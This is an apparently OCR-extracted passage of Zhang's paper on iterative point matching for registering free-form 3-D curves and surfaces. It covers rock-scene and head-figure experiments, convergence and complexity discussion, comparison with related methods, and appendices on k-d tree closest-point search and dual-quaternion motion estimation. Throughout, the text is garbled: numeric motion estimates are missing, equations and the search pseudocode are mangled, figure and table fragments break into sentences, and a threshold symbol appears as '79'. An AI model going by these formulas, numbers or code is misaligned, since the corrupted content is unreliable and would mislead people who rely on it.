first frame is displayed in solid lines while those in the second flames, in dashed lines, We apply the algorithm to the two flames. The algorithm converges after 12 iterations, It takes in total 32.5 seconds on a SUN 4/60 workstation and half of the time is spent in the first iteration (so we could speed up the process by setting o Dma x to a smaller value). The final motion estimate is [ x 10-3, x 10-2, x 10-3] r, 17 Iterative Point Matching for Registration of Free-Form Curves and Surfaces 135 Fig. 19. The first triplet of images of a rock scene Fig. 20. The second triplet of images of a rock scene --7- [ x 10, x l0, x 10z] r, where r is in radians and t is in centimeters. The motion change is: 3r = 0.78% and 6t = 0.53%. The result is shown in the lower row of Figure 18 where we have applied the estimated motion to the first frame. Excellent registration is observed for the chair. The registration of the border of the wall is a little bit worse because more error has been introduced during the 3-D reconstruction, for it is far away from the cameras. Now we exploit the coarse-to-fine strategy. As before, we do coarse matching in the first five iterations by sampling evenly one out of every five points on the curves in the first frame, followed by fine matching using all points. The algorithm converges after I2 iterations and yields exactly the same motion estimate as when only doing fine matching. The execution time, however, decreases from 32.5 seconds to 10.5 seconds, about three times faster. If we now sample evenly one out of every ten points on the curves in the first frame, and do coarse matching in the first five iterations and fine matching in the subsequent ones, the algorithm converges after 13 iterations (one iteration more), and the final motion estimate is [ x t0 3, x 10-2, x 10-3] r, [ x 10, x 10, x 102] r, which is almost the same as the one estimated using directly all points. The motion change is: 3r % and t = 0.50%. The execution time is now 8.8 seconds. 6 Experimental Results with Surfaces We provide in this section two examples. In the first example, two 3-D frames of a rock scene are reconstructed by a correlation-based stereovision system. They are first registered manually. Then we want to see the limit of our algorithm by using different initial estimates. The second example shows the registration of two range images of a head figure. 6.1A Rock Scene We show in Figure 19 and Figure 20 two triplets of images of a rock scene. The stereo rig is about 6 meters from the scene. The two positions differ by 30 degrees in rotation and 3.75 meters in translation. The correlation-based stereo system reconstructs points for the first position and points for the second position. For experimental purpose, 18 t36 Zhang we have taken two similar triplets of images having marks put on the rocks. From these marks, we are able to manually compute the displacement between the two positions. This result is shown in Figure 21 (see color figure section), where the first map is drawn in quadrangles, and the second in grayed surface. The registration is reasonable. One can observe that many points are only visible from one position. In the sequel, we vary the initial motion estimate, run our algorithm on the two frames, and then compare the results obtained by our algorithm with the result obtained manually. Note that the two frames are now expressed in the same coordinate system by applying the manual estimate to the first frame. Thus, the final estimate of the displacement between the two frames is expected to be zero, and the estimate given by the algorithm is directly the motion error with respect to the manual estimate. We have done several tests, and three of them are shown in the following. The initial estimate will be represented by a 6-vector: the first three elements constitute the r vector, and the last three, the t vector. If we set the initial estimate to [0.0, 0.0, 0.35, 0.5, -2.0, 0.2] r (i.e., a rotation of 20 degrees and a translation of 2.07 meters). The difference between the two frames corresponding to this estimate is shown in Figure 22 (see color figure section). After 40 iterations, the motion estimate given by our algorithm is [ x 10-3, x 10-2, x 10-3, x 10-2, x 10-2, x 10-2] r. Thus, there is a difference of 0.86 degrees in rotation and 5.66 centimeters in translation from the manual estimate. The result after the registration is shown in Figure 23 (see color figure section). We see that even when the initial estimate is very different from the real one, we still obtain satisfactory results. After several more iterations, we obtain a better result. What happens if we increase further the difference between the initial and final estimates? The initial estimate in this test is [0.0, 0.0, 0.35, -0.5, -2.5, 0.2] r (i.e., a rotation of 20 degrees and a translation of 2.56 meters). The difference between the two frames corresponding to this estimate is shown in Figure 24 (see color figure section). After 40 iterations, the motion estimate given by our algorithm is [ x 10-2, x 10-2, x 10 -I, x 10-1, x 10, x 10-1] T. The result is mediocre, as shown in Figure 25 (see color figure section), but it is better than the initial estimate. If we continue, the result shows some further improvement. After 80 iterations, the motion estimate is [ x 10-2, x 10-3, xl0-3, x 10-2, x 10-2, x 10-2] r. The difference with the manual estimate is of 0.92 degrees in rotation and 6.18 centimeters in translation, which is reasonably small, as shown in Figure 26 (see color figure section). Up to now, the tests we have carried out are all with a rotation around an axis perpendicular to the ground plane. What happens if the vehicle is found in two different slopes (e.g., the vehicle scrambles on a pile of rocks)? Here is an example. The initial estimate is [0.35, 0.0, 0.17, -0.5, -2.5, 0.2] r. Thus, there is a rotation of 20 degrees with respect to the ground plane, and a rotation of t0 degrees around an axis perpendicular to the ground plane. The translation between the two views is 2.56 meters. The difference between the two frames corresponding to this estimate is shown in Figure 27 (see color figure section). After 40 iterations, the motion estimate is [ x 10-2, x 10-4, x t0-3, x 10-3, x 10-2, x 10-3] r. The difference with the manual estimate is of 0.65 degrees in rotation and 2.87 centimeters in translation. The registration result is quite good, as shown in Figure 28 (see color figure section). 6.2 A Head Figure The proposed algorithm is used by Chen for range image registration (Chen 1992). One modification he has made is the closest point search procedure. He uses the technique proposed by Chen and Medioni (1992) (see Section 8). One example is shown in this section. Figure 29a and Figure 29d show two range images of a head figure. For display purpose, they are shown in shaded intensity image form. The coordinate system is defined as follows: The origin is in the center of the image, the x-axis is parallel to the columns of the images (unit in pixels), the y-axis is parallel to the rows (unit in pixels), and the z-axis points out of the paper (unit in grey levels). The two images differ by [ , 0, 0, 0, 0, 0] r. Instead of using all points, about 150 points on a regular grid are chosen from the first image, as shown 19 Iterative Point Matching for Registration of Free-Form Curves and Surfaces 137 Fig. 29. A head figure. (a) First view; (b) Result after one iteration; (c) Result after five iterations; (d) Result after 39 iterations in Figure 29a as small circles overlaid on the original image. The initial motion estimate is [0.0873, 0, 0, 0, 0, 0] r, i.e., a difference of 15 degrees in rotation from the real transformation. The result after one iteration is shown in Figure 29b, where the points from the first image after transformation (in circles) are projected to the second image. The result is very bad. After five iterations, the estimated transformation is already reasonable, as shown in Figure 29c. The algorithm converges after 39 iterations, yielding a result as shown in Figure 29d. The corresponding motion estimate is [ , ,.0008, , , ] T. The error is less than 0.3 degrees in rotation and 0.2 pixels in translation. 7 Discussions Z1 About Complexity As described earlier, each iteration of our algorithm consists of four main steps. The first is to find closest points, at an expected cost of O (m log n), where m and n are the numbers of points in the first and second frames, respectively. The second is to update the matches recovered in the first step, at a cost of O(m). The third step is to compute the 3-D motion, also at a cost of O(m). The last step is to apply the estimated motion to all points in the first frame, at a cost of O(m). Thus the total complexity of our algo- 20 - Yi 138 Zhang rithm is O(m logn). In Zhang (1992a), we show that our algorithm has a lower bound of computational cost than the string-based curve matching algorithms, e.g., Schwartz and Sharir (1987). 7.2 About Convergence Convergence is always an important issue of an iterative procedure. Our algorithm cannot be guaranteed to reach the global minimum. Although we have observed, given a reasonable start point, a good convergence of our algorithm in the experimental sections, we are not able to show that it converges monotonically to a local minimum. This is not like the algorithm of Besl and McKay (1992) (see Section 8) which converges always monotonically to a local minimum. The difference is that Pi in our objective function (2) can take a value of either one or zero depending on situations. As will be clear, however, our algorithm is wellbehaved. Let us make a thorough investigation during each iteration. As described in Section 3.2, only points whose distances to their closest points in the second frame are less than Dma ~-l x are retained as potential matches. The mean squared error d~loses t of these matches, given by m d~io~e~t - ~ Y~. Pi l)rt-ixi + t )-1 - Yi l[ 2, is upper-bounded by Dmax, I-I i.e., I I-I d~loses t _ < Dma x. Then a statistical analysis of distances is carried out, and a new distance threshold DImax is computed. The pairings whose distances are greater than Dlm~x are discarded, i.e., their pi's are turned to be zero. Thus the mean squared error du~paate I of the updated matches, given by d~pdate -- m ~ Pi lira-ix/+ ti-~ - Yi II 2, Y~-i=I P~ i=1 is less than d~loses I t, i.e., dupdate ) < dcltosest I. We have of I I course d~paate < Dma x. The least-squares technique described in Section 3.4 is applied to the remaining matches, and a new motion estimate (R E, t I) is available. Let 1, Z P~ IlRIxi + ~I - d[sq -- ~'inl Pi i=1 it/ II 2- I We have always d~s q <_ diupdate, because if dis q ;> d~pdate, then the zero motion (R x = I, t I = 0) would yield a smaller mean-squared error, which contradicts the hypothesis. Thus we have I - I 1 d/s q _< dupdate _< mln(dcloses t, Dmax), and I-I d~loses t _< Dma x. Unfortunately, we do not have the inequality: 3~+1 contains two parts. The "closestdl+l --< d~s q. Indeed, ~closest first consists of xi's which are also contained in d[s q. We can easily show that this part is always decreasing. The second part consists of xi's which are not contained in d~s q, but whose distances to their closest points are less than Dma x. The combination of the two parts is not necessarily less than d/s q. As is clear from the above discussions, the objective function is upper-bounded by Dmax. As the registration becomes better and better, Dmax in general becomes smaller and smaller, but it may be occasionally bigger. In order to ensure a monotonic decrease of Dmax, we must impose that Dma 1 _< Dma I-1 x I after computing Draax as described in Section 3.3. We have done this and rerun the algorithm with the synthetic and real data presented in Section 5, and exactly the same results have been obtained. We have also rerun the algorithm with the data presented in Section 6. For the test 1, the estimate after 40 iterations is [ x 10-3, x 10-2, x 10-3, x 10 -z, x 10-2, x 10-2] T. There is a difference of 0.11 degrees in rotation and 0.86 centimeters in translation. For the test 2, we obtained the same motion estimate after 40 iterations. The estimate after 80 iterations is [ x I0-3, x 10-3, x 10-2, x 10-2, x 10-2, x 10-2] r. There is a difference of 0.37 degrees in rotation and 3.28 centimeters in translation. For the test 3, the estimate after 40 iterations is [ x 10-2, x 10-3, x 10-3, x 10-3, x 10-2, x 10-2] r. There is a difference of 0.24 degrees in rotation and 1.73 centimeters in translation. These differences are sufficiently small compared with the resolution of the data (about 5 centimeters). In Figure 30, two graphs are shown. The first plots the evolution of the mean distance (i.e., the objective function) versus iteration number. The second plots the evolution of the number of matches after update versus iteration number (one example has al- 21 Test Berative Point Matching for Registration of Free-Form Curves and Surfaces 139 ready been given in the last row of Table 1). The data presented in Section 6 have been used. Note that there are two curves for test 2: "Test 2" for iterations from 1 to 40, and "Test 2bis" for iterations from 41 to 80. About one fourth (17749 points) of the points in the first view have been used. From Figure 30a, we see that the mean distance decreases towards 0.04 meters in all three tests. These curves confirm that our algorithm is well-behaved. As shown in Figure 30b, the number of matches varies continuously through the iterations and finally steadies towards ,~ ~750 ' I i t t! I I 0 ~ ,450 i "t II ', t I Test l 2 _ Test 2bis... Test 3 0, About Simplifications For computation consideration, we have made two simplifications. The first is that the non-symmetric matching criterion (2) is used, instead of the symmetric one (1). The second is that the approximate distance metric (4) is used, which will be discussed in Section 7.4. The symmetric matching criterion (1) is in fact also implemented for curves. Table 4 gives a comparison of the results using the two criteria. The synthetic data in Section 5 are used. Different levels of Gaussian noise are added. Ten iterations are applied in each case. Rotation errors, translation errors, and execution times are shown, each being the average of ten tries. The algorithm using the symmetric criterion yields better motion estimates than that using the non-symmetric one. This is expected because the data in the two frames both contribute to the motion estimation and neither of the frames prevails over the other. On the other hand, the execution time using the symmetric criterion is twice as long. We have also carried out an experiment with the real data described in Section 5. The algorithm using the symmetric criterion converges after 12 iterations, yielding a motion estimate 0, i i 1 i i i i 5 ]0 ] iterations (a) I I I I I I I " I ' [~ I/~--~'~" ~ tt \ -~:':~'~-.I ~.4"'~, I~ E = '" Test 1 /! '... Test 2 / _ Test 2bis, Test 3 / I I I I io 15 2o ~S iterations (b)...!! Fig. 30. Evolution of (a) the mean distance and (b) the number of matches versus iteration number critical applications the non-symmetric matching criterion is preferred. {= [ x 10-3, x l0-2, x 10-3] T, 7.4 About Sampling [ x t0, x 10, x 10z] r. The difference compared with that using the nonsymmetric criterion is 0.6% in both rotation and translation. The execution time is 70.2 seconds on a SUN 4/60 workstation, about twice as long. Thus in time As described earlier, the algorithm developed is based on the use of a simplified, instead of real, definition of the distance between a point and a shape (see Equation 4). That is, we use the minimum of all distances from a given point to each sample point of the shape. Different sampling of a shape (even the approxima- 22 140 Zhan g Table 4. Comparison between the matching criteria (1) and (2) tandard deviation :riterion (2) (1) (2) (1) (2) (1) (2) (1) (2) (1) (2) (1) otation error ranslation error , xecution time 5.04 t ,48 tion error is negligible) does affect the final estimate of the motion. Take a simple example of curves as shown in Figure 31. The curve consists of two line segments (Figure 3 la). The sampling in the first frame consists of three points as indicated by the crosses in Figure 31a. We have two samplings in the second frame. The first sampling consists of three points as indicated by dark dots, and the second sampling consists of five points by adding two additional ones (indicated by empty dots) to the first sampling, as shown in Figure 31a. The motion result between the two frames with the first sampling is shown in Figure 3 lb, and that with the second sampling, in Figure 31c. Clearly, more samples, better results. To solve the problem resulted from sampling, we should ideally use the real distance definition (Equation 3), and use the real closest points instead of the closest sample points. However, we lose the efficiency achieved with sample points. One possible improvement, as proposed in Besl and McKay (1992), could be the following: First, create a piecewise-simplex (line segments or triangles) approximation of the shape in the second frame (e.g., the Delaunay triangulation from the sample points (Faugeras et al. 1990)). Then, given a point in the first frame, a pure Newton's minimization procedure can be used to find the real closest point, starting with the closest sample point. There is an easy way to overcome the sampling problem while maintaining the efficiency of the algorithm. It consists in simply increasing the number of sample points through interpolation. The more the number of sample points, the less the sampling will affect the final motion estimate. However, this causes two problems: the increase in the memory required and the increase in the search time (because we increase also the size of the k-d tree). Thus a tradeoff must be found. From the experiments we have carried out, we have obtained satisfactory results using directly clos- est sample points because the sample points are sufficiently dense. 7.5 Uncertainty The importance of explicitly estimating and manipulating uncertainty is now well recognized by the computer vision and robotics community (Blostein and Huang 1987; Matthies and Shafer 1987; Kriegman et al. 1989; Ayache and Faugeras 1989; Szeliski 1990). This is extremely important when the data available have different uncertainty distribution for example in stereo where uncertainty increases significantly with depth. We have shown in Zhang and Faugeras (1991) that accounting for uncertainty in motion estimation (via, e.g., a Kalman filter) yields much better results. For computational tractability and as a reasonable approximation, the uncertainty in a 3-D point reconstructed from stereo is usually modeled as Gaussian; that is, it is characterized by a 3-D position vector and a 3 x 3 covariance matrix. The algorithm for motion computation described in Section 3.4 is very efficient. However, it assumes each point has equal uncertainty. And unfortunately it is difficult to extend it to fully take uncertainty into account. To fully take uncertainty into account, we can use for example Kalman filtering techniques which have been widely and successfully applied to solve quite a number of vision problems (Zhang and Faugeras 1992a). However, there will be a significant increase in computation. The method described below can partially take uncertainty into account. Indeed, we can associate, to each pairing between the two frames, a scalar weighting factor wi. Instead of minimizing Equation 5, we compute R and t by minimizing the following weighted objective function: 23 Iterative Point Matching for Registration of Free-Form Carves and Surfaces 141 X (b) (c) Fig. 31. Influence of curve sampling on motion estimation 1 N 5r(R't) = N/~I= willrxi +t-yill 2. (8) The quaternion or dual quaternion method can still be used to compute efficiently R and t. The weighting factor wi should be related to the uncertainty of Rxi -t-t --Yi. Let Axl, Ayl, and Ai be the covariance matrices of xi, yi, and Rxi + t - Yi. Axi and Ayl are given by the sensing system. Ai is then computed as Ai = RAxiR r + Ayi, where R takes the rotation matrix computed during a previous iteration as an approximation. The trace of Ai roughly indicates the magnitude of the uncertainty of Rxi q- t - Yi. Therefore, we choose wi as 1 1 wi - tr(ai) -- tr(axi) + tr(ayl)' Thus, the weighting factor is independent of the motion. We have not implemented this method in the current version. The mechanism for updating the matching, described in Section 3.3, has been designed without considering the different uncertainties in the data points. The same threshold Dmax has been used for all points. If the uncertainties in the data points and that in the motion are modeled, one would like to use a pruning criterion that better reflects the sources uncertainty. 3 The idea is the following, similar to that used in Zhang and Faugeras (1992a) for matching 3-D line segments. Let the point under consideration in the first view be x with covariance matrix Ax. Let the points in the second view be {yi} with covari- ance matrix {Ayi}. Let the motion relating the two views be d with covariance matrix Ad. The vector d could be [r r, tv] r. To be general, we define two functions relating d to the rotation matrix R and the translation t: R = f(d) and t = g(d). The (squared) Mahalanobis distance can be used to take into account the uncertainty. It is defined by d M = (f(d)x + g(d) - yi)rai (f(d)x + g(d) - yi), which can be interpreted as the squared Euclidean distance weighted by the uncertainty measure. Ai is the covariance matrix of f(d)x + g(d) - Yi, and is given, up to the first order, by Ai = f(d)axf(d) T + Ayi + JdAdJd T, where Jd is the Jacobian 0 [f(d)x + g(d)]/0d. Now the closest point to x is the point Yi having the smallest distance d/m. The reader is referred to Zhang and Faugeras (1992a) for more details on the Mahalanobis distance. As described in Section 3.3, we do not want to simply match the closest point yi with x. In order for Yi and x to be matched, the Mahalanobis distance d M must be less than some threshold z. As d M follows a X 2 distribution with three degrees of freedom, we can choose an appropriate e, for example, 7.81 for a probability of 89%. In summary, we can replace, if uncertainty is considered, the first two steps of the algorithm described in Section 3.5 by the following: 1. Find, for each point x in the first view, the point Yi having the smallest Mahalanobis distance d, M. 24 142 Zhang 2. Discard the pairings {(xi, yi)} whose d)t's are larger than the threshold s. finally group these patches into objects according to motion similarity. 7.6 About Large Motion Because of the local property of the matching criterion used, our algorithm converges to the closest minimum. It is thus best applied in situations where the motion is small or approximately known, tn the case of large motion, the algorithm can be adapted in two different ways. The first way is to apply first the global methods as cited in the introductory section to obtain an estimate, which can then be refined by applying the algorithm described in this paper. The second way is to obtain a set of initial registrations by sampling the 6-D motion space, and then apply our algorithm to each initial registration. "The final estimate corresponding to the global minimum error is retained as the optimal one. A similar method has been used in Besl and McKay (1992) to solve the object recognition problem. Z7 Multiple Object Motions In a dynamic environment, there is usually more than one moving object. It is important to have a reliable algorithm for segmenting the scene into objects using motion information. However, little work has been done so far in this direction. We have proposed in Zhang and Fangeras (1992b) a framework to deal with multiple object motions. It consists of two levels. The first level deals with the tracking of 3-D tokens from frame to frame and the estimation of their motions. The processing is completely parallel for each token. The second level groups tokens into objects based on the similarity of motion parameters. Tokens coming from a single object should have the same motion parameters. In Zhang and Faugeras (1992b) the tokens used are 3-D line segments, and the experiments have shown that the framework is flexible and powerful. This framework is used in Navab and Zhang (1992) to solve multiple object motions through motion and stereo cooperation. Now if we replace 3-D line segments by 3-D curves and estimate 3-D motion for each curve, the general framework is still applicable. For surfaces, we need to over-segment them into patches such that each patch belongs only to one object. We can then compute motion for each patch and 8 Highlights With Respect to Previous Work As mentioned in the introduction, several pieces of similar but independent work have recently been published. They include Besl and McKay (1992); Chen and Medioni (1992); Menq et al. (1992); Champleboux et al. (1992). The same idea is: iteratively matching points in one set to the closest points in another set, given the transformation between the two sets is small. However, as each algorithm is developed in its own context, different techniques have been used. One of the main differences lies in the matching criterion. Refer to Equation 2. In our algorithm, pi can take value either 1 or 0 depending on whether the point in the first set has a reasonable match in the second set or not. This is determined by the maximum tolerable distance Dmax, which, in turn, is set in a dynamic way by analyzing the statistics of the distances as described in Section 3.3. Therefore, our algorithm is capable of dealing with the following situations: Gross outliers in the data. The outliers are automatically discarded in the matching and thus have no effect on the final motion estimate. Appearance and disappearance in which curves in one set do not appear in the other set. This is usually the case in navigation where objects may enter or leave the field of view. Occlusion. An object may occlude other objects, and it may itself be occluded. This is common in both object recognition and navigation. Besl and McKay (1992) have developed an algorithm for object recognition and location, where a portion of a given model shape is assumed to be observed. In their algorithm, Pi takes always value 1. Thus, their algorithm can only deal with the case in which the first set is a subset of the second set. It is powerless in the situations described above. The quaternion algorithm is used to estimate the transformation between the two sets. The singularvalue-decomposition algorithm by Haralick et al. (1989) is suggested to replace it in order to identify outliers. Chen and Medioni (1992) have developed an algorithm for registering multiple range images in or- 25 Iterative Point Matching for Registration of Free-Form Curves and Surfaces 143 der to create a complete model of an object. About one hundred of points on a regular grid in the first range image, called control points, are used in order to save computation time. Only points in smooth areas are selected as the control points in order to find a reliable closest point by their method (see below). The method for motion estimation is not specified. Occlusion and outliers issues are not addressed. Menq et al. (1992) have developed an algorithm for registering range data points with a CAD model for the inspection purpose. In their algorithm, Pi always takes the value t, too. Occlusion and outliers issues are not addressed. The transformation is estimated by solving a set of nonlinear equations. Champleboux et al. (1992) have developed an algorithm for the registration of two sets of 3-D points obtained with a laser range finder. Assume that most (about 99%) of points in one set match surfaces in the other, an iterative nonlinear least-squares technique (the Levenberg-Marquardt algorithm) is applied to find the rigid transformation between the two sets. When the iterative process converges, the points whose distances to the other set are larger than a prefixed threshold are considered as outliers and are rejected. Some more iterations are then applied to the retained points. Another main difference is in the procedure for closest-point computation. In our applications, dense point sets are available, which are directly sorted in a k-d tree for efficient closest-point search. In Besl and McKay (1992), several methods are proposed to compute the closest point on a geometric entity (point set, curve, or surface) to a given point. In Chen and Medioni (1992), the surface normal for each control point in the first set is computed. The closest point is found, through an iterative process, at the intersection of the surface normal to the digital surface in the second frame. In Menq et al. (1992), as the model is represented by a set of parametric surface patches, the closest point is determined by solving two nonlinear equations. In Champleboux et al. (1992), the first set of 3-D points is converted into an octreespline, which is a classical octree decomposition of the work volume, followed by a further division near surface points. The Euclidean distance from nodes to the surface are computed in an exhaustive manner, and saved in the octree-spline. This allows them to quickly compute approximate Euclidean distances from points to surface. 9 Conclusions We have described an algorithm for registering two sets of 3-D curves obtained by using an edge-based stereo system, or two dense 3-D maps obtained by using a correlation-based stereo system. We have used the assumption that the motion between two frames is small or approximately known, a realistic assumption in many practical applications including visual navigation. A number of experiments have been carried out and good results have been obtained. Our algorithm has the following features: It is simple. The reader can easily reproduce the algorithm. It is extensible. More sophisticated strategies such as figural continuity can be easily integrated in the algorithm. It is general. First, the representation used, i.e., point sets, is general for representing arbitrary shapes of the type found in practice. Second, the ideas behind the algorithm are applicable to (many) other matching problems. The algorithm can easily be adapted to solve for example 2-D curve matching. It is efficient. The most expensive computation is the process of finding closest points, which has a complexity O(N log N). Exploiting the coarse-tofine strategy described in Section 4.3 considerably speeds up the algorithm with only a small change in the precision of the final estimate. It is robust to gross errors and can deal with appearance, disappearance and occlusion of objects, as described in Section 8. This is achieved by analyzing dynamically the statistics of the distances, as described in Section 3.3. It yields an accurate estimation because all available information is used in the algorithm. It does not require any preprocessing of 3-D point data such as for example smoothing. The data are used as is in our algorithm. That is, there is no approximation error. 4 The registration results do not depend on any derivative estimation (which is sensitive to noise), in contrast with many other feature-based or stringbased matching methods. However, imposing the orientation consistency in matching (Section 3.2) increases the convergence range of the algorithm. 26 144 Zhang Our algorithm can only partially take the uncertainty of measurements into account. To fully take into account the uncertainty, we should replace the quatemion or dual quaternion algorithm by other methods such as Kalman filtering techniques. This would cause a significant increase in the computational cost of the algorithm. In our algorithm, one parameter, the parameter 79, needs to be set. It indicates when the registration can be considered to be good. It has an impact on the convergence rate, as described in Section 4.1. This is a limitation of our algorithm. In our implementation, 79 is related to the resolution of the data available. This method works well for all experiments we have carried out. The result of our algorithm is not sensitive to the value of 79. Instead of 10 centimeters, we can set 79 to 8 or 12 centimeters, and the same results are obtained. However, a better method probably exists. One question raised is: can the parameter 79 be eliminated? The parameter 79 has been introduced with the concern that the initial estimate could be mediocre. If we have faith in the result provided by the instruments such as odometric and inertial systems on the mobile vehicle, then we can directly use 3or (the first case in Section 3.3) to update the matching. The parameter 79 is thus not necessary. Our algorithm converges (not necessarily monotonically) to the closest local minimum, and thus is not appropriate for solving large motion problems. Two possible extensions of the algorithm to deal with large motions have been described in Section 7.6: coupling with a global method or sampling the motion space. The proposed algorithm works better in a rugged terrain than on a fiat ground. This is because there are many local minima for a flat ground which are very close to each other. Due to the local technique we exploit, the final motion estimate will depend essentially on the initial one in this case. By the way, primitivebased methods will not work, either. No salient features can be extracted. A Search for Closest Points With k-d Trees Several methods exist to speed up the search process for closest points, including bucketing techniques and k-d trees (abbreviation for k-dimensional binary search tree). We have chosen k-d trees, because the data points we have are sparse in space. It is not efficient enough to use bucketing techniques because only a few buckets would contain many points, and many others nothing. 5 The k-d tree is a generalization of bisection in one dimension to k dimensions (Preparata and Shamos 1986). In our case, k = 3. A 3-D tree is constructed as follows. First choose a plane parallel to yz-plane passing through a data point P to cut the whole space into two (generalized) rectangular parallelepipeds 6 such that there are approximately equal numbers of points on either side of the cut. We obtain then a left son and a right son. Next, each son is further split by a plane parallel to xz-plane such that there are approximately equal numbers of points on either side of the cut, and we obtain a left grandson and a right one. We continue splitting each grandson by choosing a plane parallel to xy-plane, and so on, letting at each step the direction of the cutting plane alternate between yz-, xz- and xy-plane. This splitting process stops when we reach a rectangular parallelepiped not containing any point; the corresponding node is a leaf of the tree. A k-d tree can be constructed in O (n log n) time with O(n) storage, which are both optimal (Preparata and Shamos 1986). we now investigate the use of the 3-D tree in searching for closest points. The standard way of using k-d trees is to find all points whose distances to x are within a given value. In our case, we want to find the closest point. One possibility is to use the standard technique to find all points within a given distance, and then to find the point having the smallest distance. We have developed a recursive algorithm which allows the given distance to vary. The algorithm is thus more efficient. More formally, a node v of the 3-D tree T is characterized by two items (P(v), t(v)). Point P(v) is the point through which the space is cut into two. The parameter t (v), taking the value 0, 1, or 2, indicates whether the cutting plane is parallel to yz-, xz-, or xy-plane. Two global variables P and D are used to save the point found and the corresponding distance. They are initialized to -1 and Dmax, respectively. At the output, if P is still -1, it implies that we cannot find any point with distance less than Dmax. The search for the closest points to x is conducted by calling SEARCH(root(T), x) of the following procedure: input: a point x, a 3-D tree T; two global variables P and D initialized to -1 and Dmax, respectively. output: the closest point P and the corresponding distance D. 27 - - if - - ct Iterative Point Matching for Registration of Free-Form Curves and Surfaces 145 procedure: SEARCH(v, x) (v == leaf) return ; = x[t(v)] ; --c2 = P(v)[t(v)] ; /* c2 has been used to cut the space */ -- if (Iq -- c21 < D) and (i[x - P(v)It < D) then P ~ P(v), D ~ IIx- P(v)ll ; -- - D < c2) then SEARCH(leftson(v), x); -- if (c2 -- D < cl) then SEARCH(rightson(v), x); Unfortunately, the worst-case search time is O(n 2/3) with the 3-D tree method (see (Preparata and Shamos 1986; pp.77)). Other more efficient algorithms exist, such as a direct access method, but they require much more storage, In practice, we observed good performance with 3-D trees. We found that the search time depends on Dma. When Dmax is small, the search can be performed very fast. As we update Dmax during each iteration, it becomes quite small after a few iterations. B Motion Computation using Dual Number Quaternions For completeness, we summarize in this appendix the dual number quaternion method described in Walker et al. (1991), which can solve a weighted leastsquares problem. We can compute R and t by minimizing the following function 1 N Jr(R, t) = ~ E wi IIRxi + t - Yi 112, (9) i=i where wi is the positive weighting factor associated with the pairing between xi and yi. We can relate wi to the uncertainty in xi and Yi as shown in Section 7.5. A quaternion q can be considered as being either a 4-D vector [ql, q2, q3, q4] T or a pair ((t, q4) where Cl = [qt, q2, q3] r. A dual quatemion (t consists of two quaternions q and s, i.e., cl = q + ss, (10) where a special multiplication rule for s is defined by s 2 = 0. Two important matrix functions of quaternions are defined as Q(q) = [q4i+k(0)_ct T q4cl], (11) I q4i - K(O) 51 I (12) W(q) = -O r q4 ' where I is the identity matrix, and K((t) is the skewsymmetric matrix defined as K(0) = I 0 --q3 q2 ] q3 0 -ql -q2 ql 0 A 3-D rigid motion can be represented by a dual quatemion dl satisfying the following two constraints: qrq and qrs = 0. (13) Thus, we have still six independent parameters for representating a 3-D motion. The rotation matrix R can be expressed as R = (q42 - (tr61)i + 2C1(1T + 2q4K(O), (14) and the translation vector T = 15, where 15 is the vector part of the quaternion p given by p=w(q)ws. (15) The scalar part P4 of p is always zero. A 3-D vector x is identified with the quatemion (x, 0) 7, and we shall also use x to represent its corresponding quatemion if there is no ambiguity in the context. It can then be easily shown that Rx + t = W(Q)Ts + W(q)TQ(q)x. Thus the objective function Equation 5 can be written as a quadratic function of q and s S = l[qrclq + Wsrs + src2q + const.], (16) where N C1 = -2 E wiq(yi)tw(xi) i=1 N = -2 wi i=l K(y)K(x) + yx T --ytk(x) -K(y)x ] (17) yt x 28 146 Zhang N C2 = 2 E wi[w(xl) - Q(yi)] i=1 N[ ] = 2Ewi -K(x)-K(y) x-y (18) i=1 --(X -- y)t 0 ' N W = E wi, (19) i=1 N const. = E wi (x/rxi + y/ryi). (20) i=1 By adjoining the constraints (Equation 13), the optimal dual quatemion is obtained by minimizing f" = l[qrctq + Wsrs + srczq + const. -t- )~1 (qtq _ 1) + ~2(sTq)], (21) The error is thus minimized if we select the eigenvector corresponding to the largest eigenvalue. Having computed q, the rotation matrix R is computed from Equation 14. The dual part s is computed from Equation 24 and the translation vector t can then be solved from Equation 15. Acknowledgments This work was carried out in part in the French CNES program gap. The author would like to thank Olivier Faugeras for stimulating discussions during the work, Steve Maybank for carefully reading the draft version, and Xin Chen for providing the result described in Section 6.2. The author would also like to thank the anonymous reviewers for their suggestions and comments which helped me improve this paper. where,k I and,k2 are Lagrange multipliers. Taking the partial derivatives gives 0f' _ 1 [(Cl+cr)q+Cfs+2 lq+,k2s] 0q N = 0, (22) Of.' 1 -- [2Ws q- C2q + )~2q] = 0. (23) 0s N Multiplying Equation 23 by qr gives,k2 = -qrc2q = 0, because C2 is skew-symmetric. Thus s is given by 1 8 = -- C2q. (24) 2W Substituting these into Equation 22 yields where Aq =,kl q, (25) a=~ Thus, the quaternion q is an eigenvector of the matrix A and )~l is the corresponding eigenvalue. Substituting the above result back into Equation 21 gives ~ (const. - )~I). (27) Notes 1. Here we assume the distribution of distances is approximately Gaussian when the registration is good. This has been confirmed by experiments. A typical histogram is shown in Figure 2. More strictly, the X distribution is a better approximation if we use the sum of squared distances. As is well known in statistics (central limit theorem), the distribution can be well approximated by a Gaussian if a large number of samples are available. Indeed, we have more than one hundred point matches. 2. The double precision LINPACK rating for the SUN 4/60 is 1.05 Mflops," 3. I thank one of the reviewers for having raised this discussion. 4. It is certain that errors have been introduced during the reconstruction of 3-D points, and that they have been propagated in the motion estimate. 5. Another possibility is to apply bucketing techniques in 2-D, for example, by projecting all points on the ground or on the image plane of the sensors. We have not compared this technique with the k-d trees. 6. A generalized rectangular parallelepiped is possibly an infinite volume. 7. Note that in Walker et al. (1991) a 3-D vector x is identified with the quaternion (x/2, 0). References Arun, K, Huang, T. and Blostein, S.: 1987, Least-squares fitting of two 3-D point sets, IEEE Trans. PAMI 9(5), Ayacbe, N. and Faugeras, O. D.: 1989, Maintaining Representations of the Environment of a Mobile Robot, IEEE Trans. RA 5(6), Besl, P. and Jain, R.: 1985, Three-dimensional object recognition, ACM Computing Surveys 17(1), 29 tterative Point Matching for Registration of Free-Form Curves and Surfaces 147 Besl, P. J.: 1988, Geometric modeling and computer vision, Proc. IEEE 76(8), Besl, P. J. and McKay, N. D.: 1992, A method for registration of 3-D shapes, IEEE Trans. PAMI 14(2), Blostein, S. and Huang, T.: 1987, Error analysis in stereo determination of a 3-D point position, IEEE Trans. PAMI 9(6), Bolles, R. and Cain, R.: 1982, Recognizing and locating partially visible objects, the local-feature-focus method, lnt't J. Robotics Res. 1(3), Brockett, R.: 1989, Least squares matching problems, Linear Algebra and Its Applications 122/123/124, Champleboux, G., 